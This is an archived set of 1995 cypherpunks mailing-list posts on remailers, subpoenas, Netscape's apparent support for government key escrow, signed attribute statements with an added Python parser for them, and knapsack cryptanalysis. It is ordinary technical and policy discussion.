chain selection, not as a capsule history of the remailers. But see
below.

>   robo, syrinx, c2 all running on c2.org
>   alumni, portal run by Hal Finney
>   hacktic, replay run on xs4all / by Alex de Joode?
> 
> ok so far, but flame is xs4all/de Joode as well?

In fact, yes, at least until Tomaz gets good enough Net access in
Slovenia to support a remailer.

Alice de 'nonymous ...

                                  ...just another one of those...


P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jay Campbell <edge@got.net>
Date: Fri, 1 Dec 1995 04:16:42 +0800
To: sameer <cypherpunks@toad.com
Subject: Re: "Got a subpoena?"
Message-ID: <199511302056.MAA07241@you.got.net>
MIME-Version: 1.0
Content-Type: text/plain


>> "finessing" laws will become more important.  In short, they WILL have
>> a subpoena--then what?
>
>	Then they'll find out that I don't have any information that
>could help them, anyway.

What about a court order to (a) start comprehensive logging, and (b) not
tell anyone under penalty of ______ .
--
   Jay Campbell                edge@got.net - Operations Manager
   -=-=-=-=-=-=-               Sense Networking, Santa Cruz Node
   Jay@Campbell.net            got.net? PGP MIT KeyID 0xACAE1A89           
 
"On the Information Superhighway, I'm the guy 
  behind you in this morning's traffic jam leaning on his horn."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Fri, 1 Dec 1995 02:54:32 +0800
To: Jay Holovacs <holovacs@styx.ios.com>
Subject: Re: Netscape gives in to key escrow
In-Reply-To: <Pine.3.89.9511300825.A27268-0100000@styx.ios.com>
Message-ID: <199511301758.MAA06181@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Jay Holovacs writes:
> On Thu, 30 Nov 1995, Timothy C. May wrote:
> 
> > 
> > Can Netscape continue to prosper? This latest issue won't kill it,
> 
> I suspect this will unfortunately help. Stockholders are interested in 
> profits, not principles.

Netscape is currently trading somewhere like 7000 times earnings. What
profits are you talking about, precisely?

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Fri, 1 Dec 1995 03:00:33 +0800
To: cypherpunks@toad.com
Subject: Re: Netscape gives in to key escrow
Message-ID: <9511301801.AA19366@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


> Absent such clarification, we must assume he considers the
> press reports of what he said to be reasonably accurate.

Speaking for myself, I wouldn't feel comfortable assuming that Clark's
priorities vis-a-vis correcting a handful of misquotes were as high as
I might want them to be.

So I wouldn't take this position (fun and full of righteous wrath though
it may be).  Instead I'd be optimistic and say "he hasn't gotten around
to it yet."  Just as I figure Elvis will eventually tell all those tabloids
that he and JFK were playing cards with Hoffa in Bimini all these many years.
	/r$





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: vinnie@webstuff.apple.com (Vinnie Moscaritolo)
Date: Fri, 1 Dec 1995 06:26:24 +0800
To: cypherpunks@toad.com
Subject: Re: Netscape gives in to key escrow
Message-ID: <v02110100ace3a9062ab4@[17.203.21.75]>
MIME-Version: 1.0
Content-Type: text/plain


GAK or is it Gack!!!

You know, one possible solution lies in the direction of Apple's CyberDog.
It is based on OpenDoc and should be portable to windoze, I hate to say Rah
told you so but...

Even with all the ITAR silliness, even if on the contingency that Apple
can't provide a SSL or whatever in their HTML part, YOU can always write
your own HTML part, (it's just not that complicated) in the Cyberdog
environment and override the Apple CyberDog HTML part.

This looks like a great opportunity for some Cypherpunks to write code, and
code that people DO care about.. a CypherPunk CyberDog part to replace the
Apple HTML viewer with one that has hooks for an encryption API (GSSAPI?)


(lawyer types beware: This is definitely my opinion and you and I
both know Apple is old enough to speak for itself.)

-------------
Vinnie Moscaritolo
Apple DTS Sniper
"One Shot..One Kill"

http://webstuff.apple.com/~vinnie/

Fingerprint =  4F A3 29 81 50 E4 04 F2  78 25 01 87 6E A2 14 6A
--------------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carl Ellison <cme@TIS.COM>
Date: Fri, 1 Dec 1995 03:23:50 +0800
To: jlasser@rwd.goucher.edu
Subject: Re: The future will be easy to use
In-Reply-To: <Pine.SUN.3.91.951130123535.3869B-100000@rwd.goucher.edu>
Message-ID: <9511301819.AA11933@tis.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

>Date: Thu, 30 Nov 1995 12:39:50 -0500 (EST)
>From: Jon Lasser <jlasser@rwd.goucher.edu>

>  I'm positing someone's 
>using a stolen credit card number. [...] If I'm a merchant, I'm 
>going to really want (if I know it's possible) to ship only to what's 
>been "the address on the card" (or, in reality, in the database under the 
>card's number) so that it's harder (not impossible, harder) for people to 
>defraud me.

I'm not sure that's the reason, but there are merchants who insist on
shipping to the card's billing address.  This happens to me when I'm using
a credit card by phone, so the merchant has no signature on file.  For lack
of that proof that I'm me (as opposed to some inmate in a local prison
(actual case I heard about)), if they ship goods to the same address that
writes the actual check for the goods, there's added safety.

For a world with my non-certificates, this is achieved by a pair of
attribute statements:


- -----BEGIN PGP SIGNED MESSAGE-----

Signing-Key-ID: bc2cb00144f223498fcc074eabb821d0
Signed-Key-ID: e05c601c4ec4af3aeb54a53171ed65da
Meaning: checking-account: 116 94265, First Security Bank

- -----BEGIN PGP SIGNATURE-----
[...]   signature with First Security Bank's key (bc2cb0...)
- -----END PGP SIGNATURE-----



- -----BEGIN PGP SIGNED MESSAGE-----

Signing-Key-ID: e05c601c4ec4af3aeb54a53171ed65da
Meaning: I receive packages (especially UPS and FedEx) at:
	Carl Ellison
	c/o Trusted Information Systems
	3060 Washington Road
	Glenwood MD 21738
	(301) 854-6889

- -----BEGIN PGP SIGNATURE-----
[...]   signature with my key (e05c60...)
- -----END PGP SIGNATURE-----


The first gives the necessary hook for the merchant to establish that key
e05c6... has money to spend, if the merchant feels the need to check.  The
second establishes a shipping address for that key.

Note that the word "I" in the second attribute statement means "the person
who knows how to make the attached signature with key (e05c60...)"  rather
than "Carl Ellison" (although, in this case, they're the same).

The shipping address could be anonymous:

- -----BEGIN PGP SIGNED MESSAGE-----

Signing-Key-ID: e05c601c4ec4af3aeb54a53171ed65da
Meaning: I receive USPS packages at:
	P.O. Box 360
	Glenwood MD 21738

- -----BEGIN PGP SIGNATURE-----
[...]   signature with my key (e05c60...)
- -----END PGP SIGNATURE-----



 - Carl

+--------------------------------------------------------------------------+
|Carl M. Ellison      cme@tis.com    http://www.clark.net/pub/cme	   |
|Trusted Information Systems, Inc.   http://www.tis.com/                   |
|3060 Washington Road          PGP 2.6.2:  61E2DE7FCB9D7984E9C8048BA63221A2|
|Glenwood MD  21738         Tel:(301)854-6889      FAX:(301)854-5363       |
+--------------------------------------------------------------------------+

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

-----END PGP SIGNATURE-----

BTW -- I don't have a PO Box at Glenwood.  (cme)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Gillogly <jim@acm.org>
Date: Fri, 1 Dec 1995 06:31:23 +0800
To: cypherpunks@toad.com
Subject: Re: Getting a copy of the Jim Clark speech
In-Reply-To: <199511302041.MAA19507@infinity.c2.org>
Message-ID: <199511302124.NAA26868@mycroft.rand.org>
MIME-Version: 1.0
Content-Type: text/plain



> Raph Levien <raph@c2.org> writes:
> I called Netscape public relations. Here's what I found out:

> 1. Netscape PR does not keep transcripts, etc., of Jim Clark's speeches.
> 2. You can order a tape of the speech from Conference Copy for...

Good initiative, but we needn't wait for 6 weeks to get a copy of it.
All that needs to happen is for Jim Clark to explain what he meant, if
it's different from what was reported.  No need for all the to-ing and
fro-ing.

Perhaps what he meant was simply reiterating the announcement of October
when they said they'd support the TESSERA crypto API.  If it's worse than
this, he should explain what's going on.  If not, October was the time to
get excited rather than now.

Waiting with bated breath...

	Jim Gillogly
	Highday, 10 Foreyule S.R. 1995, 21:24




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 1 Dec 1995 04:45:27 +0800
To: Ravi Pandya <cypherpunks@toad.com
Subject: Re: Netscape gives in to key escrow
Message-ID: <ace34e4b0f0210044da9@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 7:26 PM 11/30/95, Ravi Pandya wrote:
>If you're looking for an alternative Web browser for Windows, we just made
>ours available for free at www.netmanage.com. It's fast and reliable, and
>supports HTML 3.0, inline video, software distribution, VRML (NT version),
>Real Audio, TrueSpeech, etc.

This shows the price Netscape could pay for taking a pro-surveillance,
anti-privacy stance.

Various alternatives to Netscape exist (even on the Mac), despite attempts
to make "Netscape-enhanced-encoding" (or whatever it's called) the
standard. I expect alternative browsers will catch up fairly quickly.

(As an aside, and based on my past experiences at Intel during its
rapid-growth phase, it may be tough for Netscape to keep people motivated
and focused on development, what with all the "distractions" of a stock
price of $140 when it was expected to go public at $14. CNBC reported
yesterday that several _secretaries_ at Netscape have cashed in $600K stock
options....I can imagine a lot of folks are eager to leave to enjoy their
new wealth, but will stick around for the future stock options. This
becomes a real drag on productivity, based on my experiences and those of
my friends at various other start up companies.)

I also expect that this pro-surveillance, anti-privacy "stumble" by Jim
Clark will either be quickly "clarified" (but perhaps nothing really
changed), or Netscape will suffer a black eye in public relations, with
many "Cypherpunk"-type people adopting a "Just Say No to Netscape!" stance.

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Fri, 1 Dec 1995 03:27:38 +0800
To: cme@TIS.COM
Subject: Re: Attribute-testimony example (was Re: The future will be easy touse)
Message-ID: <01HY987RZFD48WYZNO@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"cme@TIS.COM"  "Carl Ellison" 30-NOV-1995 12:34:35.18

Once an element of that set is identified, it can be assigned a codeword
(to make parsing easier).
----------
	How about an email address? Or a URL? Those can be autodetected easily
enough. Plus, the email one could be used to automatically use the
appropriate key if reading something from a particular address (whether for
decryption or for signature verification). If there are more than one with
that address, try all of them and if one turns up looking right (looks like
email headers, for instance) use that decryption. That last is even easier with
the signature verification, and that can show up the user-specified portion of
the field so as to remind you who's sent the message. Sorry if this has been
thought of (and suggested) before... it is kind of obvious.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 1 Dec 1995 05:49:35 +0800
To: cypherpunks@toad.com
Subject: Re: Netscape, Corporations, and GAK Support
Message-ID: <ace3561b10021004241f@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 8:08 PM 11/30/95, hallam@w3.org wrote:
>Folks, lay off Netscape on this one. _EVERYONE_ is doing Tessera for the feds to
>use themselves. There are reporting requirements (FOI) which most people on this
>list seem to enjoy which make the privacy issue moot. There are other people who do
>not want to have non escrowed data flowing over their internal nets, nuclear
>installations etc.

Ah, but Jim Clark's comments were as follows, and indicate that the issue
is the _government_ reading _private Net communications_:

---section of interview or speech with/by Jim Clark of Netscape, emphasis
added by me---


To secure Net communications, the government will need to have
                                  ^^^^^^^^^^
access to private data exchanges using what is known as a key escrow
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
security system, said Clark. He added that an invincible security
system for the Net is possible, but such a system won't be built
unless the government has a stake in it. "That's where key escrow
           ^^^^^^^^^^
comes in," said Clark.

Key escrow is a controversial security system advocated by the Clinton
administration that gives the government access to private Net communications.
                              ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
It uses public key cryptography, a system in which messages are coded
and decoded using a set of private and public keys. In key escrow, the
private key is held by both the individual or group and the government.
The government can use the key ostensibly to read messages for
^^^^^^^^^^^^^^^^^^
intelligence and national security reasons.

---end of section---

This is not then just an issue of supporting voluntary key escrow for
corporations, nuclear installations, germ warfare labs, and the Church of
Scientology, this is GAK, pure and simple.

Phill, very few of us are opposed to the voluntary use of escrow schemes.
I, myself, would be interested in a robust system wherein my lawyer, for
example, could have a "duplicate key" to some of my files. We have
discussed this issue many times. Truly voluntary key escrow means that the
criteria described above by Jim Clark, that government access to private
communications is "where key escrow comes in," would be impossible to
achieve. Clearly, the type of key escrow being supported by Jim Clark,
Dorothy Denning, David Sternlight, Stuart Baker, and others is hardly
voluntary.

>Key escrow is not bad in itself. It is the idea that individuals be forced to
>use it for private conversations that is the bad idea.

Carefully read Jim Clark's direct quotes and the views attributed to him in
the article.

>
>If people want to argue "make the technology available and it will be abused" then
>let them. Just remember that we normally argue the other side of the case.

No, the issue is that the proposal is explicitly GAK, not a voluntary
system. Details of deployment are of course murky, and this firestorm may
help to kill it for now, but the issue is clearly that Jim Clark is saying
the government needs to be able to read private communications and that key
escrow is needed. Given that he is the Chairman of Netscape, this is
worrisome.

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: an366601@anon.penet.fi (** CRAM **)
Date: Thu, 30 Nov 1995 22:23:45 +0800
To: cypherpunks@toad.com
Subject: call forwarding trick in Las Vegas
Message-ID: <9511301409.AA17120@anon.penet.fi>
MIME-Version: 1.0
Content-Type: text/plain




From: an453380@anon.penet.fi


Your cybercrime task forces and exotic examples sound very intriguing, 
however, here in Las Vegas, Nevada we have a situation that is exotic but not 
quite in the same way.  An "outcall" business has seemingly placed the 
telephone numbers of the major hotels into a Database along with the phone 
numbers of the local legal "outcall" services.  When a "guest" from a hotel 
calls to have an exotic dancer entertain him in his hotel room, his call is 
"call forwarded" from the service to which he called to allegedly  "S. E." and 
"R. S.".  The "call forwarding" process was accomplished by a Select Call 
Forwarding maneuver from "off premises" and was not authorized by the service 
which was "by-passed".  It seems no one much cares, (except the services from 
which the business was stolen), so this character is stealing to the tune of 
approximately $200,000.00 per week.  How long will it be until he taps into 
the banks, etc?  Does he pay taxes on his "full income"?  How can this 
maneuver be cancelled by the owners of the businesses from which are being 
stolen?  This guy is so brazen/stupid, he brags about "his accomplishment".

Any input would be much appreciated.

--****ATTENTION****--****ATTENTION****--****ATTENTION****--***ATTENTION***
Your e-mail reply to this message WILL be *automatically* ANONYMIZED.
Please, report inappropriate use to                abuse@anon.penet.fi
For information (incl. non-anon reply) write to    help@anon.penet.fi
If you have any problems, address them to          admin@anon.penet.fi




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carl Ellison <cme@TIS.COM>
Date: Fri, 1 Dec 1995 04:03:51 +0800
To: EALLENSMITH@ocelot.Rutgers.EDU
Subject: Re: Attribute-testimony example (was Re: The future will be easy touse)
In-Reply-To: <01HY987RZFD48WYZNO@mbcl.rutgers.edu>
Message-ID: <9511301916.AA17069@tis.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

>Date: Thu, 30 Nov 1995 13:33 EDT
>From: "E. ALLEN SMITH" <EALLENSMITH@mbcl.rutgers.edu>

>Once an element of that set is identified, it can be assigned a codeword
>(to make parsing easier).
>----------
>	   How about an email address? Or a URL? 

In this case, I was talking about an abbreviation for an attribute
rather than for a person --  e.g.,

	"checking-account: <number>,<bank>"

standing, for example, for

	"The person (entity) capable of signing with the signed-key 
identified above is authorized to withdraw money from checking account
number <number> at <bank>."


However, in offline mail I just had this interchange:

>>Date: Thu, 30 Nov 1995 12:47:28 -0500 (EST)
>>From: Jon Lasser <jlasser@rwd.goucher.edu>
>
>>Maybe it is just out of habit.  But there's another aspect, not looking 
>>at other people, but looking at oneself:
>>
>>"This is _my_ key."
>>
>>"But my name isn't on the key."
>>
>>"The key says I belong to it."
>>
>>"Hey!  I'm not just a number!"
>
>I think you're exactly right here.  That's the problem.
>
>Perhaps we need to include the person's name in the keyID.
>
>So instead of: 
>
>Signed-Key-ID: e05c601c4ec4af3aeb54a53171ed65da
>
>we could use:
>
>Signed-Key-ID: Carl Ellison (e05c601c4ec4af3aeb54a53171ed65da)
>

or

Signed-Key-ID: e05c601c4ec4af3aeb54a53171ed65da (Carl Ellison)

to follow the SMTP example, or

Signed-Key-ID: e05c601c4ec4af3aeb54a53171ed65da (Carl Ellison <cme@tis.com>)

to follow the PGP example.


In this case, the text attached to the key is optional -- but there for the
people who feel attached to their names.  It's left off (or replaced with a
handle) for folks who want anonymity.

The fact remains that the key is the source of authority here.  The name
acquires validity from the key, not the other way around, and that might
upset some people who bother to think about it.  However, those who prefer
to think the name is important can view the key hash as an added field
making the name unique -- with the extra added bonus of being tied strongly
to a public key.

 - Carl

+--------------------------------------------------------------------------+
|Carl M. Ellison      cme@tis.com    http://www.clark.net/pub/cme	   |
|Trusted Information Systems, Inc.   http://www.tis.com/                   |
|3060 Washington Road          PGP 2.6.2:  61E2DE7FCB9D7984E9C8048BA63221A2|
|Glenwood MD  21738         Tel:(301)854-6889      FAX:(301)854-5363       |
+--------------------------------------------------------------------------+

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

-----END PGP SIGNATURE-----
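
Added example (not from Carl Ellison's messages and not part of PGP): a parser for the attribute statements shown in "The future will be easy to use" and for the Signed-Key-ID forms listed in the message above, with the merchant check that chains the bank's statement to the ordering key and to that key's own shipping statement. It assumes PGP has already verified each signature and reports the hash of the key that verified; the function names, the matching on "checking-account:" and "I receive", the look-alike key, the account and the addresses are constructed for illustration.

```python
import re
from dataclasses import dataclass
from typing import Iterable, Optional, Tuple

HASH = re.compile(r"\b[0-9a-f]{32}\b")   # key hashes in the messages are 32 hex digits


def key_hash(field: str) -> str:
    """Return the key hash from a *-Key-ID field; any attached name is a comment.

    Accepts 'hash', 'hash (Name)', 'hash (Name <addr>)' and 'Name (hash)'.
    A field holding more than one hash is ambiguous and is rejected.
    """
    found = HASH.findall(field.lower())
    if len(found) != 1:
        raise ValueError(f"expected exactly one key hash in {field!r}")
    return found[0]


@dataclass(frozen=True)
class Statement:
    signer: str              # hash from Signing-Key-ID
    subject: Optional[str]   # hash from Signed-Key-ID; None when the key speaks for itself
    meaning: str             # Meaning text, continuation lines joined with "\n"


def parse_statement(text: str) -> Statement:
    fields, last = {}, None
    for line in text.splitlines():
        if not line.strip():
            continue
        if line[0] in " \t" and last is not None:   # indented line continues the field
            fields[last] += "\n" + line.strip()
            continue
        name, sep, value = line.partition(":")
        last = name.strip().lower()
        if not sep or last in fields:
            raise ValueError(f"malformed or repeated field: {line!r}")
        fields[last] = value.strip()
    if "signing-key-id" not in fields or "meaning" not in fields:
        raise ValueError("Signing-Key-ID and Meaning are both required")
    subject = fields.get("signed-key-id")
    return Statement(key_hash(fields["signing-key-id"]),
                     None if subject is None else key_hash(subject),
                     fields["meaning"])


def squash(text: str) -> str:
    return " ".join(text.split()).lower()


def stated_address(meaning: str) -> Optional[str]:
    """Address lines of an 'I receive ... at:' statement (wording is an assumption)."""
    head, _, rest = meaning.partition("\n")
    return squash(rest) if head.lower().startswith("i receive") and rest else None


def approve_shipment(bank_key: str, order_key: str, ship_to: str,
                     verified: Iterable[Tuple[str, str]]) -> bool:
    """Decide whether to ship an order that was signed by order_key.

    verified holds (hash of the key whose signature checked out, statement text)
    pairs, i.e. the output of signature verification done before this code runs.
    """
    funded = addressed = False
    for sig_key, text in verified:
        try:
            st = parse_statement(text)
        except ValueError:
            continue                      # unparseable statements prove nothing
        if st.signer != sig_key.lower():
            continue                      # header names a key that did not sign it
        if (st.signer, st.subject) == (bank_key, order_key):
            funded = funded or st.meaning.lower().startswith("checking-account:")
        elif st.signer == order_key and st.subject is None:
            addressed = addressed or stated_address(st.meaning) == squash(ship_to)
    return funded and addressed


# Key hashes quoted in the messages above; everything else below is constructed.
BANK = "bc2cb00144f223498fcc074eabb821d0"
CARL = "e05c601c4ec4af3aeb54a53171ed65da"
LOOKALIKE = "0" * 29 + "bad"              # a different key reusing the same name

ACCOUNT = (f"Signing-Key-ID: {BANK}\n"
           f"Signed-Key-ID: {CARL} (Carl Ellison <cme@tis.com>)\n"
           "Meaning: checking-account: 000 00000, Example Bank\n")
SHIP = (f"Signing-Key-ID: {CARL}\n"
        "Meaning: I receive USPS packages at:\n"
        "\tP.O. Box 000\n\tExampleville MD 00000\n")
DROP = (f"Signing-Key-ID: Carl Ellison ({LOOKALIKE})\n"
        "Meaning: I receive USPS packages at:\n"
        "\t1 Maildrop Lane\n\tElsewhere MD 00000\n")
VERIFIED = [(BANK, ACCOUNT), (CARL, SHIP), (LOOKALIKE, DROP)]
BOX, MAILDROP = "P.O. Box 000\nExampleville MD 00000", "1 Maildrop Lane\nElsewhere MD 00000"

if __name__ == "__main__":
    print("vouched key, its own address:", approve_shipment(BANK, CARL, BOX, VERIFIED))
    print("same name, other key:        ", approve_shipment(BANK, LOOKALIKE, MAILDROP, VERIFIED))
    print("vouched key, foreign address:", approve_shipment(BANK, CARL, MAILDROP, VERIFIED))
```

The name in parentheses never enters the decision: only the key hash is compared, so a second key carrying the same name gains nothing from the bank's statement.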




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Fri, 1 Dec 1995 04:20:59 +0800
To: cypherpunks@toad.com
Subject: Netscape, Corporations, and GAK Support
Message-ID: <199511301940.OAA25768@pipe9.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   Picking up on Tim's and Atilla's comments on Netscape, GAK,
   a WTO czar and government regulation of security on the
   Net:

   Jim Clark's speech was probably a trial balloon, to see
   what the reaction would be. Remember that the NIST
   conference on KE is December 5.

   It would make sense for the corporations to welcome
   application of police power to handle threats to public
   order, in cyberworld like the other. That way they reduce
   culpability for failures of their private security systems,
   as they do on private real estate property.

   Key escrow requires someplace for the buck to stop beyond
   several private pitstops, and that is usually Uncle Sugar
   when no other party has the resources to withstand
   sustained, substantial, culture-wide risk -- as, say, in
   the financial realm. Internationally, the same need exists.

   Probably the corporations  would like to work in concert
   with governments on this, so no single firm, or nation,
   gets stigmatized, or wounded and prey to vultures -- as
   Netscape was with the brute hack, and as Microsoft and
   others have been with other attacks on their lightly
   guarded property, or as the US might be if it does not work
   out international agreements.

   Moreover, it has been noted here that government contracts
   are crucial for a new company -- for testing, for
   credibility, for prestige. All the major players already
   have such vital contracts -- indeed most would not have
   thrived without them -- so why would Netscape, and its 
   investors, not want them too?

   It's possible that Netscape was selected to sound off on KE
   to see if it could play with the Big Boys -- take the heat,
   pass initiation, qualify for the Bohemian Grove bear hugs
   of assured stability, growth and profits.
   
   Could be, though, that after getting stable R/E for his 
   backers, Jim will be confident enough to join Pixar in that 
   rhumba risk of mercurial, evanescent mass-marketers.

   That's not to be believed now at 7,000 times earnings.









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Corey Bridges <corey@netscape.com>
Date: Fri, 1 Dec 1995 07:33:08 +0800
To: cypherpunks@toad.com
Subject: Re: Netscape gives in to key escrow
Message-ID: <199511302245.OAA00266@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Speaking for me and not Netscape:

I am not in favor of governmental key escrow. Getting that news yesterday
made for the worst day I've had in a while. 

However, I think that history will look back on this period and snicker.
"They thought they could pull off key escrow? Yeah, right." I think that
things are going to get pretty ugly over the next few years, but ultimately,
it's too late. The genie's out of the bottle. 

I'm not going to say "Don't give up on Netscape." Do what you feel you should.

*I'm* not giving up on Netscape, however. We haven't adopted this as a
company position, and besides, I think I can do more good on the inside than
on the outside. 

In a related matter, there was talk a couple days back about creating a PGP
plug-in for Netscape Navigator. I've actually been thinking about that for a
couple months, but I make a much better writer than a programmer. (And if
you've ever read any of my books, keep your jokes to yourself.) Anyway, if
people out there are interested in doing the real work on such a product,
I'd be more than willing to help with the documentation, UI, and other
things where I have a modicum of talent. I'd also put a copy of it on my
home page and hype it internally.

In an unofficial capacity, natch.

Corey Bridges
Security Documentation Manager
Netscape Communications Corporation
415-528-2978





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Fri, 1 Dec 1995 04:22:42 +0800
To: <cypherpunks@toad.com>
Subject: Re: WTO an even worse possibility as Inet regulator
In-Reply-To: <Pine.BSD.3.91.951130184221.7762G-100000@usr3.primenet.com>
Message-ID: <9511301947.AA05400@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain



>  a very credible white paper is circulating for the WTO to establish an 
>internet CZAR to regulate the Internet and level the playing field world 
>wide. 

>   personally, the Feds and the FCC are bad enough --now they want to 
>have a **global** bureaucracy play god  -???


Depends on what the role of the Czar is. If it is to stop silliness like 
border disputes and keep national governments out of the loop then it
could be a good thing. If they want to regulate it is a bad thing.

WTO is mainly known for the GATT which they brokered. This is basically
an agreement amongst national governments to be "hands off" in their
tariff regulations. 

There is the potential for governments to regulate the Internet. It is
in everyone's interest to keep hands off but if one starts to regulate
then it is in others' interests to regulate. The general solution to
prisoner's dilemma games is to form some type of alliance. It is not
possible to form alliances in classical prisoner's dilemmas since they
are restricted to a single dilemma at a time. Governments are involved
with multiple dilemmas and hence have multiple agreements. The main reason to
keep a treaty is that the credibility of government depends on keeping 
treaties. Thus a treaty can solve a prisoner's dilemma problem since 
the gain from breaking one treaty is more than offset by the potential loss
through other sides abrogating other treaties.


I suspect that the role of an Internet Czar would be mainly ensuring that 
fat Internet pipes arrived throughout the third world. George Soros has
been very active in this area, he paid for much of the infrastructure
development into Eastern Europe. If we could persuade Bill Gates that his 
mission in life was to cable Africa to the Internet somehow we might have the
whole planet online before 2000.

I would not be too worried about WTO banning crypto or attempting looney
tune ideas like insisting on OSI protocols. The UN generally does some very 
worthwhile work in allocating radio frequencies and such like and has done so 
for many years without problems. They allocate areas of the Clarke belt for 
satellites and do all sorts of mundane tasks.


One of the odd things about power is that the larger the scale the more mundane 
the decisions. At the local level councillors decide to build or close schools 
and hospitals. At the global level negotiations are held on the size of holes in 
fishing nets and the exact specifications of ball bearings.

If people want to see the Federal government weakened in power the only way to 
do so is to make it cede power both upwards and downwards. A national speed 
limit may be a bad idea (I personally think what was wrong was 55mph) but 
national standard roadsigns is a good idea. International standard roadsigns are 
a better idea still. 


		Phill.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Fri, 1 Dec 1995 04:45:49 +0800
To: cypherpunks@toad.com
Subject: Re: Netscape, Corporations, and GAK Support
In-Reply-To: <199511301940.OAA25768@pipe9.nyc.pipeline.com>
Message-ID: <9511302008.AA05390@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain



Folks, lay off Netscape on this one. _EVERYONE_ is doing Tessera for the feds to
use themselves. There are reporting requirements (FOI) which most people on this 
list seem to enjoy which make the privacy issue moot. There are other people who do 
not want to have non escrowed data flowing over their internal nets, nuclear 
installations etc.

When I was involved in the site security area there was no way I would allow 
messages to be bouncing round the internal net which I could not read. They
might well be from trojan horses planted inside the net sending data out.

Key escrow is not bad in itself. It is the idea that individuals be forced to 
use it for private conversations that is the bad idea.


If people want to argue "make the technology available and it will be abused" then
let them. Just remember that we normally argue the other side of the case.


		Phill







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Thomas Grant Edwards <tedwards@Glue.umd.edu>
Date: Fri, 1 Dec 1995 04:52:05 +0800
To: cypherpunks@toad.com
Subject: whither NetBill? (micropayments)
Message-ID: <Pine.SUN.3.91.951130152758.1025A-100000@volt.isr.umd.edu>
MIME-Version: 1.0
Content-Type: text/plain



NetBill (http://www.ini.cmu.edu/netbill/) appears to be a great way for 
implementing micropayments.  Does anyone know what the deal is, or did 
Visa sign on just to keep it from happening?

-Thomas





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eamon Daly <eamon@cosc.canterbury.ac.nz>
Date: Fri, 1 Dec 1995 16:12:22 +0800
To: cypherpunks@toad.com
Subject: Knapsack-based cryptosystems
Message-ID: <199511300231.PAA21496@kiwi>
MIME-Version: 1.0
Content-Type: text/plain


Some convoluted questions for knowledgeable c'punks:

What's the state-of-the-art in cryptanalysis of knapsack-based
cryptosystems? I know the fate of Merkle-Hellman, Graham-Shamir
etc. as written by Brickell and Odlyzko in _Contemporary Cryptology_
(edited by Simmons). What of the Chor-Rivest cryptosystem (I'm aware
of the attack in Eurocrypt 95)? Finally, has any work been done on
cryptanalysis of the dense compact knapsack-based cryptosystem of
Glenn Orton? ("A Multiple-Iterated Trapdoor for Dense Compact Knapsacks"
in _Eurocrypt 94_)

Thanks for any information.

Eamon Daly




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jonathan Zamick <JonathanZ@consensus.com>
Date: Fri, 1 Dec 1995 08:20:16 +0800
To: sameer <sameer@c2.org>
Subject: Re: "Got a subpoena?"
Message-ID: <v02120d03ace3efad2ed8@[157.22.240.13]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:46 AM 11/30/95, sameer wrote:
>>
>> What about a court order to (a) start comprehensive logging, and (b) not
>> tell anyone under penalty of ______ .
>
>        Aren't court orders part of the public record? I don't quite
>know how this would work. I don't think they can keep me from telling
>people that I've started comprehensive logging, or at least keep it
>from being found out. (Legally, that is. I'm sure they could always
